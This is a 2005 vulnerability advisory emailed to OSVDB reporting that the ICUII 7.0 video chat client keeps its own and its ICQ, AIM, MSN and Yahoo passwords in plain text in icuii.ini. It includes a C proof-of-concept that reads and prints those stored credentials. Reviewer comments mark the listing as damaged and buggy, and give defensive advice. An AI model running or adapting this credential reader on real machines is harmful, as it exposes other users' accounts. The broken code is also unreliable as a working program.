From: kozan@netmagister.com
To: moderators@osvdb.org
Date: Wed, 27 Apr 2005 23:30:29 +0300
Subject: ICUII 7.0 discloses passwords to local users.

---------------------
Application:
---------------------
ICUII 7.0

---------------------
Introduction:
---------------------
Vendor: Cybration - www.icuii.com
Vendor Description: ICUII is a full-color IP-based videoconferencing system. ICUII includes a Quick Message function that can send audio, text, and/or a video image to any user on the directory, or to your Pal list. Other features include visual caller ID, a 'do not disturb' option, a buddy list, picture e-mail, user profiles with pictures, a 320x240-pixel viewing screen, content filters, global listings, and Instant Message forwarding of new and saved Instant messages. Home and office routers and intranets can use ICUII on all machines. PAL authorization lets you decide who adds you to their pal list and lets you remove yourself from unwanted pals. ICUII has all-in-one instant messaging from the 4 most popular programs: AIM, ICQ, MSN, and Yahoo are integrated into one system. Version 7.0 includes a Flash-based text chat system where you and your friends can have group text chat if video calls and messages are not an option.

---------------------
Bug:
---------------------
ICUII 7.0 stores all of its passwords in plain text, without any encryption, in the file "\\Program Files\icuii\icuii.ini", where any local user who can read the file can view them.

Password storage format of "icuii.ini" (the right-hand sides are placeholders for the user's actual values):

[UserInfo]
NickName=icuii_nick
Location=icuii_location
Comment=icuii_comment
Email=icuii_user_mail_address

[PWFilters]
StartingPW=icuii_password

[ICQ]
Name=icq_number
Other=icq_password

[AIM]
Name=aim_account
Other=aim_password

[MSN]
Name=msn_account
Other=msn_password

[Yah]
Name=yahoo_account
Other=yahoo_password

---------------------
Vendor Confirmed:
---------------------
No.

---------------------
Fix:
---------------------
There is no solution at the time of this entry.
---------------------
Exploit:
---------------------
/*****************************************************************
  ICUII 7.0 Local Password Disclosure Exploit by Kozan

  Application: ICUII 7.0 (and probably prior versions)
  Producer: Cybration - www.icuii.com
  Vulnerability Description: ICUII 7.0 discloses passwords to local users.

  Discovered & Coded by Kozan
  Credits to ATmaCA
  www.netmagister.com - www.spyinstructors.com
  kozan@netmagister.com

  What the listing shows: it builds the path
  <ProgramFilesDir>\icuii\icuii.ini from a registry value and prints the
  text that follows a handful of "Key=" markers in that file. It uses
  nothing beyond ordinary read access to the file, so the exposure is
  governed entirely by who can read icuii.ini.

  For defenders: the advisory lists no vendor fix, so the practical
  controls are to restrict read access on icuii.ini to the owning
  account, to avoid saving the instant-messenger passwords inside ICUII,
  and to treat passwords already stored there as disclosed on any
  machine other users can log on to.

  NOTE(review): the listing is damaged by page extraction (header names
  after #include are gone, part of adresal() is missing, one string
  literal is wrapped) and does not compile as shown. It also contains
  several C defects, flagged inline below.
*****************************************************************/

/* NOTE(review): both header names were lost in extraction. The code uses
   registry calls and FILE/printf/strlen/strcat, so presumably these were
   <windows.h> and <stdio.h> (and <string.h> would also be needed) --
   confirm against the original posting. */
#include
#include

/* Handle for the opened registry key; written by RegOpenKeyEx in main(). */
HKEY hKey;
/* Size in bytes of the path buffer below. */
#define BUFSIZE 100
/* Receives the ProgramFilesDir value, then has "\icuii\icuii.ini" appended.
   File-scope, so it starts out zero-filled. */
char prgfiles[BUFSIZE];
/* In/out buffer length passed to RegQueryValueEx. */
DWORD dwBufLen=BUFSIZE;
/* Return code of RegQueryValueEx. */
LONG lRet;

/*
 * adresal ("adres al", Turkish for "get address"): scan the file at
 * FilePath for the marker string Str.
 *
 * Returns the value of ftell(di)-strlen(Str) once the marker has been
 * matched (apparently the file offset where the marker starts), or -1 if
 * the file cannot be opened or the marker is not found.
 *
 * Sayac ("counter") is incremented once per outer-loop pass and used as a
 * rewind position in the fseek call below.
 */
int adresal(char *FilePath,char *Str)
{
    char kr;
    int Sayac=0;
    int Offset=-1;
    FILE *di;
    di=fopen(FilePath,"rb");
    if( di == NULL )
    {
        /* NOTE(review): di is NULL on this path; passing NULL to fclose()
           is undefined behaviour. The call should simply be dropped. */
        fclose(di);
        return -1;
    }
    /* NOTE(review): feof() only becomes true after a read has already
       failed, so the loop body runs once more at end of file. */
    while(!feof(di))
    {
        Sayac++;
        /* NOTE(review): the text between "i" and "0 )" on the next line was
           lost when the page was extracted (everything from a '<' up to the
           following '>' is missing). The loop condition and the start of
           the loop body are therefore not shown, and the braces below no
           longer balance. */
        for(int i=0;i0 )
                {
                    fseek(di,Sayac+1,SEEK_SET);
                }
                break;
            }
            /* Reached when the index has passed the second-to-last
               character of Str; the match position is derived from the
               current file position. */
            if( i > ( strlen(Str)-2 ) )
            {
                Offset = ftell(di)-strlen(Str);
                fclose(di);
                return Offset;
            }
        }
    }
    fclose(di);
    return -1;
}

/*
 * oku (Turkish for "read"): return the text that follows the marker Str in
 * the file at FilePath, up to (not including) the first 0x0D (carriage
 * return) byte.
 *
 * Returns "" when adresal() reports -1 or the file cannot be reopened.
 *
 * NOTE(review): three defects in this function:
 *  - it returns Feature, a local array whose lifetime ends when the
 *    function returns, so every caller reads a dangling pointer
 *    (undefined behaviour); a caller-supplied buffer would be needed;
 *  - i is never checked against the 500-byte size of Feature, so a value
 *    with no carriage return within 499 bytes writes past the array;
 *  - cr is a char, so the EOF result of getc() cannot be told apart from
 *    data and is stored into Feature once before feof() ends the loop.
 */
char *oku(char *FilePath,char *Str)
{
    FILE *di;
    char cr;
    int i=0;
    char Feature[500];
    /* Locate the marker first; adresal() opens and closes the file itself. */
    int Offset = adresal(FilePath,Str);
    if( Offset == -1 )
        return "";
    if( (di=fopen(FilePath,"rb")) == NULL )
        return "";
    /* Skip past the marker so only the value is copied. */
    fseek(di,Offset+strlen(Str),SEEK_SET);
    while(!feof(di))
    {
        cr=getc(di);
        /* 0x0D = carriage return: end of the INI line. */
        if(cr == 0x0D)
            break;
        Feature[i] = cr;
        i++;
    }
    Feature[i] = '\0';
    fclose(di);
    return Feature;
}

/*
 * Entry point: resolve the Program Files directory from the registry,
 * append "\icuii\icuii.ini", and print the NickName, Location, Comment,
 * Email and StartingPW values found in that file.
 *
 * Returns 0 on success, -1 if the registry query fails or the "NickName="
 * lookup is judged to have failed.
 */
int main()
{
    /* NOTE(review): there is no else branch. If the key cannot be opened,
       prgfiles stays empty and the strcat below yields the path
       "\icuii\icuii.ini" instead of reporting an error. */
    if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                    "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                    0,
                    KEY_QUERY_VALUE,
                    &hKey
                    ) == ERROR_SUCCESS)
    {
        /* NOTE(review): RegQueryValueEx does not guarantee that a string
           value comes back NUL-terminated; the code relies on it. */
        lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,(LPBYTE) prgfiles, &dwBufLen);
        if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
        {
            RegCloseKey(hKey);
            printf("An error occured!\n");
            return -1;
        }
        RegCloseKey(hKey);
    }
    /* NOTE(review): no length check before appending. A ProgramFilesDir
       value close to BUFSIZE bytes would overflow prgfiles here. */
    strcat(prgfiles,"\\icuii\\icuii.ini");
    /* NOTE(review): == compares pointer values, not string contents, so
       this test only succeeds if the compiler happens to merge the two ""
       literals. strcmp() or a first-character check is what is meant. */
    if(oku(prgfiles,"NickName=")=="")
    {
        printf("ICUII is not installed on your system!\n");
        return -1;
    }
    printf("ICUII 7.0 Local Password Disclosure Exploit by Kozan\n");
    printf("Credits to ATmaCA\n");
    /* NOTE(review): the literal below is wrapped across two lines by the
       page extraction; a raw line break inside a string literal is not
       valid C. */
    printf("www.netmagister.com - 
www.spyinstructors.com\n");
    printf("kozan@netmagister.com\n\n");
    /* Each call re-scans the file for one marker and prints its value. */
    printf("Nickname: %s\n",oku(prgfiles,"NickName="));
    printf("Location: %s\n",oku(prgfiles,"Location="));
    printf("Comment : %s\n",oku(prgfiles,"Comment="));
    printf("E-Mail : %s\n",oku(prgfiles,"Email="));
    printf("Password: %s\n",oku(prgfiles,"StartingPW="));
    /*
    This example only prints the main ICUII entries. The icuii.ini layout
    in the advisory shows the ICQ, AIM, MSN and Yahoo! passwords stored in
    the same plain-text form, so those accounts are equally exposed and
    their passwords need changing as well.
    */
    return 0;
}
Kozan...